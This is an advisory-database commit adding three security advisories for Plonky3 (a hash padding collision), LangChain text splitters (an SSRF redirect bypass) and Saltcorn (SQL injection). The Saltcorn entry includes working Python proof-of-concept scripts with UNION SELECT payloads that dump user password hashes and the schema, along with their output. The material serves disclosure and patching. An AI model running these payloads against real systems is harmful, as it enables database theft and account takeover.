Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit 389034b419b7 · 2026-04-16T22:54:26.000Z
GHSA-3g92-f9ch-qjcm GHSA-fv5p-p927-qmxr GHSA-jp74-mfrx-3qvh
diff --git a/advisories/github-reviewed/2026/04/GHSA-3g92-f9ch-qjcm/GHSA-3g92-f9ch-qjcm.json b/advisories/github-reviewed/2026/04/GHSA-3g92-f9ch-qjcm/GHSA-3g92-f9ch-qjcm.json
@@ -0,0 +1,59 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-3g92-f9ch-qjcm",
+  "modified": "2026-04-16T22:52:41Z",
+  "published": "2026-04-16T22:52:41Z",
+  "aliases": [],
+  "summary": "Plonky3: The sponge construction used to get a hash function from a cryptographic permutation is not collision resistant for inputs of different lengths",
+  "details": "### Vulnerability\nCurrently, when hashing, if the number of elements to hash is not a multiple of the rate, `hash_iter` pads by elements of\nthe current state. This means that it is possible to create iterators of different lengths which lead to an identical hashed state.\n\nGiven a simple example using a `PaddingFreeSponge` with width 8 and rate 4.\nStart with the zero state: [0, 0, 0, 0, 0, 0, 0, 0]\nTake the first 4 elements to hash and insert into the first 4 elements of the state: [h0, h1, h2, h3, 0, 0, 0, 0]\nRun the cryptographic permutation on the state: [p00, p10, p20, p30, p40, p50, p60, p70]\n\nTake the next 4 elements to hash and insert into the first 4 elements of the state: [h4, h5, h6, h7, p40, p50, p60, p70]\nRun the cryptographic permutation: [p01, p11, p21, p31, p41, p51, p61, p71]\n\nRepeat the above two steps until all elements of the iterator have been consumed.\n\nIf the number of elements in the iterator is not a multiple of 4 (say there are 10 elements) then, in the final round,\nthe first 2 elements are overwritten and so our final hash would be of: [h8, h9, p21, p31, p41, p51, p61, p71]\n\nThis means that the iterators over the elements [h0, h1, h2, h3, h4, h5, h6, h7, h8, h9] and [h0, h1, h2, h3, h4, h5, h6, h7, h8, h9, p21] would lead to the same final state of the hasher.\n\n### Impact\n\nThe impact of this vulnerability is a little difficult to estimate. It is important to note that, in circumstances where the number of elements to be hashed is known and fixed in advance, (as is the case for most STARKS), the method is collision resistant. This vulnerability only applies if a malicious user is able to manipulate the number of elements to be hashed.\n\nThat being said, there are theoretically situations where this could allow for an amortising of grinding costs (if a prover can manipulate things to get the same hasher state across multiple proofs).\n\n### Patches\n\nThe fix comes in two parts. The documentation on the current struct `PaddingFreeSponge` has been improved to clarify its intended use case and highlight that it is not collision resistant if an attacker can modify the number of elements being hashed.\n\nIn addition we add a new struct `Pad10Sponge` which is slightly less efficient but safe in all cases. The padding strategy of the new struct is as follows:\n\nIf the number of elements in the iterator is not a multiple of the rate, use a 10 padding scheme. If it is a multiple of the rate add 1 to the first secret state element. In the above example, for hashes of length 9, 10, 11, 12, the final state to be permuted would be\n[h8, 1, 0, 0, p41, p51, p61, p71]\n[h8, h9, 1, 0, p41, p51, p61, p71]\n[h8, h9, h10, 1, p41, p51, p61, p71]\n[h8, h9, h10, h11, p41 + 1, p51, p61, p71]\n\nAs can be seen, it is now impossible for iterators of different lengths to produce the same \"final state\" to be hashed which restores collision resistance. (See the following for more details [padding-in-sponge.pdf](https://github.com/user-attachments/files/24465342/padding-in-sponge.pdf))\n\n### Thanks\nMany thanks to Benedikt Wagner, Dmitry Khovratovich and Bart Mennink for reporting this issue.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "crates.io",
+        "name": "p3-symmetric"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "0.5.2"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/Plonky3/Plonky3/security/advisories/GHSA-3g92-f9ch-qjcm"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/Plonky3/Plonky3/commit/5c1dc1d64c0516a8911bbf3ea40f173c21d6ae47"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/Plonky3/Plonky3"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-328"
+    ],
+    "severity": "LOW",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-16T22:52:41Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/04/GHSA-fv5p-p927-qmxr/GHSA-fv5p-p927-qmxr.json b/advisories/github-reviewed/2026/04/GHSA-fv5p-p927-qmxr/GHSA-fv5p-p927-qmxr.json
@@ -0,0 +1,55 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-fv5p-p927-qmxr",
+  "modified": "2026-04-16T22:53:32Z",
+  "published": "2026-04-16T22:53:32Z",
+  "aliases": [],
+  "summary": "LangChain Text Splitters: HTMLHeaderTextSplitter.split_text_from_url SSRF Redirect Bypass",
+  "details": "## Summary\n\n`HTMLHeaderTextSplitter.split_text_from_url()` validated the initial URL using `validate_safe_url()` but then performed the fetch with `requests.get()` with redirects enabled (the default). Because redirect targets were not revalidated, a URL pointing to an attacker-controlled server could redirect to internal, localhost, or cloud metadata endpoints, bypassing SSRF protections.\n\nThe response body is parsed and returned as `Document` objects to the calling application code. Whether this constitutes a data exfiltration path depends on the application: if it exposes Document contents (or derivatives) back to the requester who supplied the URL, sensitive data from internal endpoints could be leaked. Applications that store or process Documents internally without returning raw content to the requester are not directly exposed to data exfiltration through this issue.\n\n## Affected versions\n\n- `langchain-text-splitters` < 1.1.2\n\n## Patched versions\n\n- `langchain-text-splitters` >= 1.1.2 (requires `langchain-core` >= 1.2.31)\n\n## Affected code\n\n**File:** `libs/text-splitters/langchain_text_splitters/html.py` — `split_text_from_url()`\n\nThe vulnerable pattern validated the URL once then fetched with redirects enabled:\n\n```python\nvalidate_safe_url(url, allow_private=False, allow_http=True)\nresponse = requests.get(url, timeout=timeout, **kwargs)\n```\n\n## Attack scenario\n\n1. A developer passes external URLs to `split_text_from_url()`, relying on its\n   built-in `validate_safe_url()` check to block requests to internal networks.\n2. An attacker supplies a URL pointing to a public host they control. The URL\n   passes `validate_safe_url()` (public hostname, public IP).\n3. The attacker's server responds with a `302` redirect to an internal endpoint\n   (e.g., an unauthenticated internal admin API, or a cloud instance metadata\n   service that does not require request headers — such as AWS IMDSv1).\n4. `requests.get()` follows the redirect automatically. The redirect target is\n   **not** revalidated.\n5. The response body is parsed and returned as `Document` objects to the\n   application.\n\n**Notes:**\n\n- The core issue is a bypass of an explicitly provided SSRF protection.\n  `split_text_from_url()` included `validate_safe_url()` specifically to be\n  safe with untrusted URLs — the redirect loophole defeated that guarantee.\n- Cloud metadata endpoints that require special headers (AWS IMDSv2, GCP, Azure)\n  are not reachable through this bug because the attacker does not control\n  request headers. AWS IMDSv1, which requires no headers, is reachable.\n- Data exfiltration requires the application to return Document contents to the\n  party that supplied the URL. The SSRF itself — forcing the server to issue a\n  request to an internal endpoint — does not require this.\n\n## Fix\n\nThe fix replaces `requests.get()` with an SSRF-safe httpx transport (`SSRFSafeSyncTransport` from `langchain-core`) that validates DNS results and pins connections to validated IPs on every request, including redirect targets, eliminating redirect-based bypasses.\n\nAdditionally, `split_text_from_url()` has been deprecated. Users should fetch HTML content themselves and pass it to `split_text()` directly.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "langchain-text-splitters"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.1.2"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/langchain-ai/langchain/security/advisories/GHSA-fv5p-p927-qmxr"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/langchain-ai/langchain"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-918"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-16T22:53:32Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/04/GHSA-jp74-mfrx-3qvh/GHSA-jp74-mfrx-3qvh.json b/advisories/github-reviewed/2026/04/GHSA-jp74-mfrx-3qvh/GHSA-jp74-mfrx-3qvh.json
@@ -0,0 +1,93 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-jp74-mfrx-3qvh",
+  "modified": "2026-04-16T22:51:43Z",
+  "published": "2026-04-16T22:51:43Z",
+  "aliases": [],
+  "summary": "Saltcorn: SQL Injection via Unparameterized Sync Endpoints (maxLoadedId)",
+  "details": "## Summary\nSaltcorn's mobile-sync routes (`POST /sync/load_changes` and `POST /sync/deletes`) interpolate user-controlled values directly into SQL template literals without parameterization, type-casting, or sanitization. Any authenticated user (role_id ≥ 80, the default \"user\" role) who has read access to at least one table can inject arbitrary SQL, exfiltrate the entire database including admin password hashes, enumerate all table schemas, and—on a PostgreSQL-backed instance—execute write or DDL operations.\n\n## Details\n### Vulnerable code paths\n\n**Primary: `packages/server/routes/sync.js` — `getSyncRows()` function**\n\n```js\n// Line 68 — maxLoadedId branch (no syncFrom)\nwhere data_tbl.\"${db.sqlsanitize(pkName)}\" > ${syncInfo.maxLoadedId}\n\n// Line 100 — maxLoadedId branch (with syncFrom)\nand info_tbl.ref > ${syncInfo.maxLoadedId}\n```\n\n`syncInfo` is taken verbatim from `req.body.syncInfos[tableName]`. There is no `parseInt()`, `isFinite()`, or parameterized binding applied to `maxLoadedId` before it is embedded into the SQL string passed to `db.query()`.\n\n`db.sqlsanitize()` is used elsewhere in the same query to quote *identifiers* (table and column names) — a correct use — but is never applied to *values*, and would not prevent injection anyway because it only escapes double-quote characters.\n\n**Variant H1-V2: `packages/server/routes/sync.js` — `getDelRows()` function (lines 173–190)**\n\n```js\n// Lines 182-183 — syncUntil and syncFrom come from req.body.syncTimestamp / syncFrom where alias.max < to_timestamp(${syncUntil.valueOf() / 1000.0})   and alias.max > to_timestamp(${syncFrom.valueOf() / 1000.0})\n```\n\n`syncUntil = new Date(syncTimestamp)` where `syncTimestamp` comes from `req.body`. The resulting `.valueOf() / 1000.0` is still interpolated as a raw numeric expression.\n\n**Route handler: lines 113–170 (`/load_changes`)**\n\n```js\nrouter.post(\n  \"/load_changes\",\n  loggedIn,           // <-- only authentication check; no input validation\n  error_catcher(async (req, res) => {\n    const { syncInfos, loadUntil } = req.body || {};\n    ...\n    // syncInfos[tblName].maxLoadedId is passed directly into getSyncRows\n```\n\n## PoC\nPlease find the attached script to dump the user's DB using a normal user account.\n\n### Dumping users table\n```python\n#!/usr/bin/env python3\nimport requests\nimport json\nimport re\n\nBASE = \"http://localhost:3000\"\nEMAIL = \"ccx@ccx.com\"\nPASSWORD = \"Abcd1234!\"\n\ns = requests.Session()\n\nprint(\"[*] Fetching login page...\")\nr = s.get(f\"{BASE}/auth/login\")\nmatch = re.search(r'_sc_globalCsrf = \"([^\"]+)\"', r.text)\ncsrf_login = match.group(1)\n\nprint(\"[*] Logging in...\")\nr = s.post(f\"{BASE}/auth/login\", json={\"email\": EMAIL, \"password\": PASSWORD, \"_csrf\": csrf_login})\n\nprint(\"[*] Extracting authenticated CSRF token...\")\nr = s.get(f\"{BASE}/\")\nmatch = re.search(r'_sc_globalCsrf = \"([^\"]+)\"', r.text)\ncsrf = match.group(1)\n\nprint(\"[*] Dumping users...\")\npayload = \"999 UNION SELECT 1,email,password,CAST(role_id AS TEXT),CAST(id AS TEXT) FROM users--\"\nbody = {\"syncInfos\": {\"notes\": {\"maxLoadedId\": payload}}, \"loadUntil\": \"2030-01-01\"}\nheaders = {\"CSRF-Token\": csrf, \"Content-Type\": \"application/json\"}\n\nr = s.post(f\"{BASE}/sync/load_changes\", json=body, headers=headers)\n\nif r.status_code == 200:\n    print(json.dumps(r.json(), indent=2))\nelse:\n    print(f\"Failed: {r.status_code}\")\n```\n\nOutput:\n\n```bash\n(dllm) dllm@dllm:~/Downloads/saltcorn/artifacts/scripts$ python poc_h1_sqli_minimal.py\n[*] Fetching login page...\n[*] Logging in...\n[*] Extracting authenticated CSRF token...\n[*] Dumping users...\n{\n  \"notes\": {\n    \"rows\": [\n      {\n        \"_sync_info_tbl_ref_\": \"1\",\n        \"_sync_info_tbl_last_modified_\": \"admin@admin.com\",\n        \"_sync_info_tbl_deleted_\": \"$2a$10$BiEwZkMIpaBrj5yySQhbVuObOp5bpPpfxZYZDtV.VCTv.UxfI7o.6\",\n        \"id\": \"1\",\n        \"owner_id\": \"1\"\n      },\n      {\n        \"_sync_info_tbl_ref_\": \"80\",\n        \"_sync_info_tbl_last_modified_\": \"ccx@ccx.com\",\n        \"_sync_info_tbl_deleted_\": \"$2a$10$B0WWDy27n1H5D6M0.drOfOlCfp39jcsmk2Ueopx6R3SUwDV/ii0Hm\",\n        \"id\": \"80\",\n        \"owner_id\": \"2\"\n      }\n    ],\n    \"maxLoadedId\": \"80\"\n  }\n}\n```\n\n### Dumping schema\nUse the following script below to dump the schema: \n\n```python\n#!/usr/bin/env python3\nimport requests\nimport json\nimport re\n\nBASE = \"http://localhost:3000\"\nEMAIL = \"ccx@ccx.com\"\nPASSWORD = \"Abcd1234!\"\n\ns = requests.Session()\n\nprint(\"[*] Fetching login page...\")\nr = s.get(f\"{BASE}/auth/login\")\nmatch = re.search(r'_sc_globalCsrf = \"([^\"]+)\"', r.text)\ncsrf_login = match.group(1)\n\nprint(\"[*] Logging in...\")\nr = s.post(f\"{BASE}/auth/login\", json={\"email\": EMAIL, \"password\": PASSWORD, \"_csrf\": csrf_login})\n\nprint(\"[*] Extracting authenticated CSRF token...\")\nr = s.get(f\"{BASE}/\")\nmatch = re.search(r'_sc_globalCsrf = \"([^\"]+)\"', r.text)\ncsrf = match.group(1)\n\nprint(\"[*] Enumerating database schema...\")\npayload = \"999 UNION SELECT 1,name,type,CAST(sql AS TEXT),NULL FROM sqlite_master WHERE type='table'--\"\nbody = {\"syncInfos\": {\"notes\": {\"maxLoadedId\": payload}}, \"loadUntil\": \"2030-01-01\"}\nheaders = {\"CSRF-Token\": csrf, \"Content-Type\": \"application/json\"}\n\nr = s.post(f\"{BASE}/sync/load_changes\", json=body, headers=headers)\n\nif r.status_code == 200:\n    print(json.dumps(r.json(), indent=2))\nelse:\n    print(f\"HTTP {r.status_code}: {r.text[:500]}\")\n```\n\nOutput:\n\n```bash\n(dllm) dllm@dllm:~/Downloads/saltcorn/artifacts/scripts$ python poc_h1_schema_enum.py \n[*] Fetching login page...\n[*] Logging in...\n[*] Extracting authenticated CSRF token...\n[*] Enumerating database schema...\n{\n  \"notes\": {\n    \"rows\": [\n      {\n        \"_sync_info_tbl_ref_\": \"CREATE TABLE \\\"notes\\\" (id integer primary key, owner_id INTEGER)\",\n        \"_sync_info_tbl_last_modified_\": \"notes\",\n        \"_sync_info_tbl_deleted_\": \"table\",\n        \"id\": \"CREATE TABLE \\\"notes\\\" (id integer primary key, owner_id INTEGER)\",\n        \"owner_id\": null\n      },\n<SNIP>\n    \"maxLoadedId\": \"CREATE TABLE users (\\n      id integer primary key,      \\n      email VARCHAR(128) not null unique,\\n      password VARCHAR(60),\\n      role_id integer not null references _sc_roles(id)\\n    , reset_password_token text, reset_password_expiry timestamp, \\\"language\\\" text, \\\"disabled\\\" boolean not null default false, \\\"api_token\\\" text, \\\"_attributes\\\" json, \\\"verification_token\\\" text, \\\"verified_on\\\" timestamp, last_mobile_login timestamp)\"\n  }\n}\n```\n\n## Impact\n- **Confidentiality: CRITICAL** — Attacker reads the entire database: all user credentials (bcrypt hashes), configuration secrets including `_sc_config`, all user-created data, and the full schema.\n- **Integrity: CRITICAL** — On PostgreSQL the same endpoint can execute INSERT/UPDATE/DELETE/DROP. On SQLite, multiple-statement injection may be possible depending on driver configuration.\n- **Availability: CRITICAL** — Attacker can DROP tables or corrupt the database.\n- **Scope: Changed** — Any authenticated user (role_id=80) can access admin-tier data and beyond.\n- **Privilege escalation** — Admin password hashes are exfiltrated; offline cracking of weak passwords grants admin access.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@saltcorn/server"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.4.6"
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@saltcorn/server"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "1.5.0-beta.0"
+            },
+            {
+              "fixed": "1.5.6"
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "@saltcorn/server"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "1.6.0-alpha.0"
+            },
+            {
+              "fixed": "1.6.0-beta.5"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/saltcorn/saltcorn"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-89"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-16T22:51:43Z",
+    "nvd_published_at": null
+  }
+}
